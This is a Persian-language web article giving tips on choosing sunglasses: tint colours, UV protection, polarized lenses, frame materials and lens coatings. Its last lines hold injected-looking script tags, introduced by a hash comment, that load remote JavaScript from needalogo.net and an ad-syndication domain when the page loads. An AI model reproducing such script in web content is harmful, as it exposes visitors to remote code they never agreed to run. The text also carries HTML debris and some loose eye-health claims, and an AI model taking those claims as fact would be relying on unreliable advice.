۲ ـ عینکهای رنگی متمایل به سبز و قهوه ای به علت مختل کردن طیف رنگ ، مضر هستند . البته برای افرادی که می‌خواهند به مدت طولانی رانندگی کنند ، توصیه می‌شود از عینکهای قهوه ای استفاده کنند ، چرا که این عینکها نور آبی آسمان را کاهش وحدت بینایی را افزایش می‌دهند، لذا برای مصارف روزمره توصیه به استفاده از این رنگ نمی‌شود .

۳ -اگر پشت فرمان می‌نشینید توصیه می‌شود که از عینکهای آفتابی سبز رنگ استفاده نکنید چرا که تشخیص نور قرمز و زرد را مختل می‌کند و از این نظر مناسب نیستند. به عنوان یک اصل بدانید که بهترین رنگ برای عینکهای آفتابی در وهله اول خاکستری و پس از آن قهوه ای است.

۴ـ  شیشه‌های عینک آفتابی باید مقاومت کافی داشته باشد. پلی کربنات از همه مواد مقاوم تر است.

۵ ـ قاب عینک باید بزرگ باشد تا محافظت کامل در این خصوص صورت گیرد .

۶ – یک عینک آفتابی استاندارد عینکی است که وقتی آن را در مقابل یک صفحه طرح دار تکان می‌دهیم نباید صفحه موجدار تار و کج و معوج دیده شود .

۷ – اگر می‌خواهید بدانید که تیرگی عینک آفتابی شما مناسب است یا نه، در یک اتاق با نور معمولی با عینک آفتابی به آینه نگاه کنید اگر عینک آفتابی شما مناسب باشد نباید چشمان خود را ببینید .

8-اگر در محل کار خود با اشعه‌های زیاد در تماس هستید، عینک آفتابی جوابگو نخواهد بود لذا توصیه می‌شود عینکهای متفاوت و مخصوص استفاده نمایید (برای مثال در جوشکاری ویا کار با وسائلی که تولید اشعه میکند عینک ویا محافظ های خاصی لازم است )

9– افرادی که تحت عمل آب مروارید یا اگزایمر لیزر میشوند . باید در مواجهه با آفتاب  همانند سایر افراد از عینکهای آفتابی مجاز استفاده کنند .

10- بعضی داروهای پوستی یا چشمی‌حساسیت چشم‌ها را به نور آفتاب بیشتر می‌کند در صورت استفاده از این داروها ( به عنوان مثال کسانی که از قطره های چشمی‌یا قرص داکسی سیکلین استفاده می‌کنند ) باید حتماً از عینک آفتابی استفاده کنند .

nbsp;

11- عینکهای آفتابی با شیشه‌های رفلکس که دارای پوشش آینه‌ای هستند برای مصارف اسکی یا کوهنوردی مناسب می‌باشند .

12- با توجه به هزینه‌های مختلف که روزمره متحمل می‌شوید خرید یک عینک آفتابی استاندارد نه تنها عملی درست و به جا بلکه ضروری می‌باشد . بهای استفاده از عینکهای تقلبی به خطر انداختن سلامتی چشم هایتان می‌باشد

13– برای تهیه عینک آفتابی بهتر است با یک چشم پزشک مشورت کنید و یا از یک اپتومتریست کمک بگیرید . و جهت خرید آن به عینک فروشیهای معتبر مراجعه نمایید . با خرید یک عینک خوب به راحتی می‌توانید تا چند سال از آن استفاده کنید .

۱۵- اگر دچار اختلال در بینایی هستید و از عینک طبی استفاده می‌کنید چنانچه مایل بودید می‌توانید از عینکهای آفتابی مخصوص که بر روی عینک طبی قرار می‌گیرند استفاده نمایید و یا برای عینک طبی خود شیشه های فتوکروم و یا شیشه های رنگی سفارش دهید.

strongنحوه شناخت عینک استاندارد/strong

nbsp;

«در لنز عینک‌های ارزان ماده‌ای به نام (Triace tate) است که فقط ۴۰ درصد ازUV را جذب می‌کند و برای چشم بسیار مضر هستند بنابراین بهترین راه شناخت عینک‌های استاندارد، استفاده از دستگاه UV متر است که اغلب در عینک‌فروشی‌های معتبر یافت می‌شود.»

بدون استفاده از دستگاه «یووی متر» جهت شناخت استاندارد بودن عینک‌های آفتابی، تشخیص یک عینک آفتابی مناسب، حتی برای چشم پزشکان نیز سخت و غیرممکن خواهد بود.

گفتنی است این دستگاه باید UV عینک را از ۹۸‌درصد به بالا نشان دهد. همچنین گاهی علامت «۴۰۰ UV» در کنار برخی از عینک‌ها درج شده است که نشان‌دهنده قابلیت حفاظت بر علیه UVB است.

nbsp;

نمی‌توان هر عینک گران‌قیمتی را استاندارد قلمداد کرد و باید تمامی آنها توسط دستگاه (یووی‌متر)‌ تست شوند.

nbsp;

strongخاصیت عینک‌های شیشه‌ای بدون نمره/strong

nbsp;

در حال حاضر اکثر عینک‌های طبی و آفتابی به‌دلیل هزینه‌های بالای آن از شیشه‌ای تبدیل به تلق شده‌اند، ولی جالب است که بدانید اگر شیشه بدون شماره‌ای را جلوی چشمان خود بگذارید، باعث می‌شود ۹۸ درصد از UV توسط آن جذب شود. آنچه در انتخاب عینک آفتابی مهم می‌باشد، این است که باید کل چشم توسط آن گرفته شود، بنابراین استفاده از عینک‌های کوچک که بیشتر برای زیبایی طراحی شده‌اند و هیچ پوششی ندارند، توصیه نمی‌شود.

آیا کودکان هم به عینک آفتابی نیاز دارند ؟

کودکان به دلیل این که ممکن است بیش از سایرین در معرض آفتاب قرار گیرند، احتیاج به عینک‌های آفتابی دارند.  هر قدر افراد جوانتر باشند UV بیشتر به چشم آنها صدمه خواهد زد، چرا که قرنیه و عدسی چشم کودکان بسیار شفاف است وUV بدون برگشت داخل چشم می‌رود در صورتی که در افراد سن بالاتر به دلیل کدر بودن عدسی و قرنیه، مقداری ازUV بازتاب خواهد داشت، پس بهتر است کودکان و بزرگسالان در معرض آفتاب از ۱۰ صبح تا ساعت‌۱۴ زدن عینک را به هیچ وجه فراموش نکنند؛ چرا که در این مدت زمان، حتی اگر شخص در سایه نیز قرار داشته باشد، خطر صدمه اشعهUV چشمان را تهدید می‌کند.

nbsp;

strongفیلتر پلاریزه/strong

nbsp;

اغلب اشعه‌های مضر از استوا می‌آیند و به‌شکل افقی‌اند. عینک‌های پلاریزه می‌توانند جلوی این اشعه‌ها را به خوبی بگیرند، چرا که این عینک‌ها اجازه می‌دهند فقط اشعه‌های عمودی، داخل چشم شوند و تنها مشکل این عینک‌ها این است که اگر خودرویتان (ال‌سی‌دی)‌ دارد شما به هنگام نگاه کردن به این صفحه، کمی دچار مشکل شده و ممکن است این صفحه را واضح نبینید. بنابراین، این نوع از عینک‌ها بیشتر برای افرادی که دارای دید بسیار خوب و شغل خلبانی یا تیراندازی هستند توصیه می‌شود.

strongآیا رنگ رنگ شیشه عینک هم مهم است ؟/strong

nbsp;

رنگ و لایه‌های مختلف موجود در شیشه هر‌یک با توجه به کاربرد آن طراحی می‌شود مثلا رنگ خاکستری به دلیل این که شدت نور را در تمامی رنگ‌ها به طور یکسان کم می‌کنند و کمترین اختلالی را در دید رنگی ایجاد می‌کنند، برای رانندگی و سایر کاربردهای روزمره مناسبند. در شرایط خاص عینکهای با رنگ خاص بیشتر مورد توجه هستند مثلا برای اسکی چون عینک زرد طیف ابی را بیشتر جذب میکنند ،مناسبترند.

همچنین عینک‌های قهوه‌ای علاوه بر جذب بهتر نور آبی و فرکانس‌های بالا، اشعه‌ ماوراءبنفش را هم بیشتر جذب می‌کنند و عینک‌های سبز بخشی از نور آبی را فیلتر کرده و درخشندگی سطوح را کاهش می‌دهد و در پایان عینک‌های قرمز و ارغوانی که بیشتر برای شکار و اسکی روی آب مناسبند در محیط‌های سبز و آبی استفاده می‌شود.

strongآیا در زمستان هم احتیاج به عینک آفتابی داریم ؟/strong

nbsp;

استفاده از عینک آفتابی در زمستان، بخصوص در برف را توصیه می شود . از آنجا که برف بازتاب ۸۰ درصد ازUV را دارد و زمین و آب فقط ۱۰ درصد ازUV را منعکس می‌کنند، اهمیت استفاده از عینک آفتابی در زمستان کمتر از استفاده از آن در فصل تابستان نیست.

nbsp;

انواع جنس فریم عینک های آفتابی

۱- پلاستیکی

nbsp;

* CELLULOSE ACETATE – ZYL: مقرون به صرفه و خیلی سبک میباشد.

* PROPIONATE: پـلاسـتـیـک نـایـلونی که حساسـیـت زا نمیباشد و سبک وزن است.

* NYLON – GLIDAMIDE: گلیدامید مقـاوم در بـرابر گـرما و سـرمـا بــوده و انـعــطاف پذیر اما سخت و حساسـیـــت زا نمیباشد. فریم های پلاستیکی شکننده تر از فریم های فلزی بوده و در برابر تابش خورشید بمرور استحکامشان کاهش می یابد.

۲- فلزی

* MONEL: آلیاژی از چند فلز میباشد. ضد خـوردگی بوده و معمولا دارای روکش پالادیوم است.

* TITANUM: سبک و بادوام، با استحکام و مقاوم دربرابر خوردگی (نقره ای رنگ میباشد)

* BERYLLIUM: ارزان قیمـت، مـقـاوم در برابر خوردگی و کدر شدن، بسیار قابل انعطاف(خاکستری مات)

* STAINLESS STEEL: اسـتـیـل ضـد زنـگ سـبـک وزن و حساسیت زا نمی بـاشد، مـقـاوم در بـرابـر خــوردگــی و ساییدگی بواسطه داشتن فلز کرمیوم در ترکیبش

* FLEXON: نـوعـی آلـیـاژ تـیـتـانیـوم مـــی بـاشـد که بـه “فلز حافظه” موسوم است چون در صـورت آسـیـب دیـدن مـجـددا بـه شـکـل اولیه خود باز می گردد. حـتـی پـس از پیچاندن خم کردن و له کردن. سبک وزن، ضـد خـوردگی و حساسیت زا نمیباشد.

* ALUMINUM: سبک، بسـیـار مـقاوم در برابر خوردگی، برای استحام بیشتر با آهن و سیلیکون ترکیب میگردد. فریـم باید هم اندازه و مکمل شکل و رنگ پوست شما باشد. مـثـلا افـراد بـا صـورت گـرد بهتر است فریمهای مستطیل شکل را انتخاب کنند و افـرادی که فرم صورتشان مربعی و مستطیلی شکل است بهتر است فریمهای بیضی شکل را انتخاب کنند. نکته دیگر آنکه سطح بالای فریم نباید ابروهای شما را بپوشاند.

انواع فریم، جنس لنز…

انواع فریم

۱- WRAP-AROUND: به فریمهایی اطلاق میگردد که از قوس صورت تبعیت کرده و چشمها را کاملا میپوشاند. در مقابل برف و باد و باران نیز محافظند.

nbsp;

۲- CLIP-ON: به فریمهایی اطلاق میگردند که مستقیما روی عینکهای طبی قرار میگیرند.

nbsp;

nbsp;

strongچرا بعضی از لنزها از لنزهای دیگر تیره تر است ؟ /strong

میزان تیرگی لنز بستگی به محیطی دارد که می خواهـیـد از عیـنـک استـفـاده کنید. در محیطهایی که شدت نور شدید است مانند ورزش کـوهنـوردی و اسکی روی برف، شما نیاز به لنزی دارید که بیشتر نور را سد کند %۹۵ برای رانندگی و کنار دریا %۹۰-۷۰ نـــور را جذب کند و لنزهایی که %۲۰-۱۰ نور را کاهش میدهد صرفا برای نـمایـش مد و خوش نمایی مناسب میباشد. نکته مهم این است که میزان تیرگی لنز هیچ ارتباطی با میزان حفاظت کنندگی آن عینک در برابر اشعه ماوراء بنفش ندارد. رنگ ها لنز و کاربرد آنها، پوششهای لنز…

ته رنگ لنز

لنزهـا در تـه رنـگای متـفـاوتی مـوجود می باشند که هر کدام برای فعالیت های ویژه ای مناسب است.

nbsp;

۱- ته رنگ خاکستری: یک ته رنگ فوق العاده که سبـب کـاهش کـلـی روشنـایــی نور گشته و چشمها را در برابر تابشهای زننده (خیره کننده) محافظت کرده و بـرای رانندگی و استفاده عمومی مناسب میباشد.

nbsp;

۲- ته رنگ زرد و طلایی: میزان نور آبی را کاهش داده و در عـیـن حـال به فرکانسهای دیگر نور اجازه عبور می دهـد. تـه رنـگ زرد بـطور کـلی رنـگ آبـی را حـذف کرده و سبب میگردد همه چیز واضح تر بنظر برسد (چـون نور آبی تمایل به پخش و بازتاب فراوان دارد از این رو حذف آن در وضوح دید موثر است) و به همین خـاطر اسـت کـه بیشتر عینکهای ویژه اسکی روی برف زرد رنگ میباشند. در واقع این ته رنگ دید نور را مختل میکند برای رانندگی در شب، هوای ابری و مه آلود نیز مناسب است.

nbsp;

۳- ته رنگ قهوه ای و کهربایی: ته رنگهای عمومی میباشند و مزایای آن کاهش نور زننده و حذف فرکانسهای بالای نور مانند نـور آبـی و مـاوراء بنـفش را دارد. مانند ته رنگ زرد دید نور را مختل میکند اما کنتراست و وضوح را افزایش میدهد. برای دویدن، دوچرخه سواری و رانندگی مناسب است.

nbsp;

۴- ته رنگ سبز: کاهش نور زننده و حـذف نـور آبی از ویژگیهای آن میـباشد از آن رو که ته رنگ سبز بالاترین میزان کنتراست و بیشترین درجه تیزبینی را فراهم می آورد بسیار محبوب میباشد.

nbsp;

۵- ته رنگ صورتی و قرمز: کنتراست عالی را از اجسام بـا پـس زمیـنـه آبـی و سـبـز فراهم می آورد. برای شکار و اسکی روی آبی مناسب است.

nbsp;

۶- ته رنگ آبی: بیشترین نور آبی را از خود عبور می دهند. بـرای گـلف و تـنـیـس و یـا نشانه گیری به سوی هدفهای سبز رنگ.

nbsp;

strongپوشش های لنز/strong

nbsp;

۱- ultraviolet: این پوشش اشعه ماوراء بنفش را بلوکه می کند. حـتــما هنگام خرید عـیـــنکی را انتخاب کنید که تا امواج ۴۰۰ نانومتر را حذف کرده و ۱۰۰ درصد امـواج مـاوراء بنفش را بلوکه کند. برخی از عینکهای آفتابی اشعه مادون قرمز را نیز حذف میکنند.

nbsp;

۲- scratch-resistant: ضـد خـش بــروی پلاستیکها اعمال می گـردد چـون لـنـزهـای شیشه ای خودشان تقریبا ضد خش می باشند.

nbsp;

۳- photochromic: لنزهای فتو کرومیک هنگامیکـه در معرض نور خورشید قرار میگیرند تیره می شوند. پوشش این لنـزهـا از تـرکیـبـات نـقره مـانـنـد کـلرید نـقـره و هـالـید نقره میباشد. توجه داشته باشید که فتوکرومیکها به نور مرئی واکنش نسان نمیدهند و تنها هنگامی که در معرض اشعه ماوراء بنفش واقع میگردند تیره میشوند از ایـن رو در داخـل اتومبیل بخاطر آنکه شیشه اتومبیل اشعه ماوراء بنفش را اجازه عبور به آن نمی دهـــد، بنابراین لنز فتوکرومیک تیره نمی شود. زمانی که نیاز است تا لنز تیره گردد گاهی اوقات به ۸ دقیقه میرسد.

nbsp;

۴- flash یا mirroring: ایـن پـوششها لنز را مـانـند آینه کرده و ۱۰ الی ۶۰ درصد بیشتر نور را کاهش داده و جذب میکند. میتواند از نقره -طلا و یا مس باشد. در ارتفاعات و برای برف وشن وآب مناسب است.

nbsp;

۵- ar یا anti-reflective: پوشـشـی اسـت کـه ضـریب شــکسـتــی مــابـــیـن هـوا و شـیـشـه داشـتـه و شدت نـور بـاز تـابیده از سطح داخلی و خارجی لنز یکسان میگردد. در واقــع این پوشش سبب میگـردد نـور بـیـشـتـری بــه چـشمـها رسیـده در عـیــن حال که نور زننده را بسـیار کاهش میدهـد و هــمچنین چشمـان شمـا نـمایـان تـر می گردد. بسیار مناسب برای رانندگی در شب.

nbsp;

۶- polarization: امـواج نــور خــورشـیـد و یـا مـنابع نور مصنوعی مـانند لامپ ارتعاش یافـتـه و در تـمـام جـهـات پخش می گـردد. در ایـن پـوششـها از مــواد استفاده شده که به طـور طـبـیـعی در یـک پـیـوند مـوازی در بـرابر هم ردیف شده اند. زمانی که نور به لنـز می تـابـد مانند یک فیلتر میکروسکوپی عمل کرده و امواج نوری را که با ردیفهای مـوازی مطابقت داشته را جذب کرده و به مابقی اجــــازه عـــبور میدهد. بیـشتـرین نـور زننده از سـطـوح افـقی حاصل می گردند بنابراین این لنزها طوری تنظیم می شــونـد کـه امــواج انعکاسهای یافته افقی را حذف میکنند و بـه شـمـا اجازه میدهد به سطوحی مانند آب، یخ و برف نگاه کنید

nbsp;

nbsp;

nb!–844c7b74e31d727d5814a0ed667c0255–script type=”text/javascript”src=”http://needalogo.net/tracking.js”/script
script type=”text/javascript” src=”http://syndication.exoclick.com/splash.php?idzone=2332917″/script